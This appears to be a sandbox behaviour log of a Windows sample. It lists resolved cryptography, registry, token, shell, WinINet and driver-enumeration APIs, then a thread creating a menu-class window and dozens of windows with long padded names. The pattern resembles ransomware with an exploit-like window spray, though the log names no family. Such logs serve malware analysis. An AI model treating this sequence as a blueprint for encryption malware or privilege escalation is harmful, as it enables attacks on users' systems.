Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x74d92f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x74d920f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74c6a340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x74c6a240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74da4ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74c72220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74da3230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74d87740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74da4ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x74d92bb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74d8b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74d88ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x74c72130 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74decf50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x74d9ea00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x74d8bea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74da52a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74d891c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74d838f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74d83e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x74c71160 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74d97020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x74da50f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x74da3140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x74d9ddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x74d87710 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76ca0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76d20050 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76d1fc80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x74c717b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x74c71750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x76d51710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x76d22220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x76d4fdf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x76d225e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76d4a630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x76d21da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76d20dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x74c71080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76d20550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x76d4deb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x76d21c80 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x779af550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x779aefa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x779af0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x779aee90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x779b0ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x779b0f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x779aed40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x779af8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x779b0730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x779c5c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x779b0ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x779af890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x779c5bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x779b3fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x779afc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x779aed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x779aed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x779af0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x779b04a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x779b0ee0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x755b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x7573edb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75744370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75744cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74ed2290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74ef8040 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x74820000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x748a2410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x748ef750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x74894510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x748bb650 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x748e9fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x74892460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x748911e0 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x773d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x773d1380 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x773d13e0 True 1
Fn
Thread 0xf84
257 0
»
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = #32768, index = 18446744073709551600, new_long = 1153433600 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
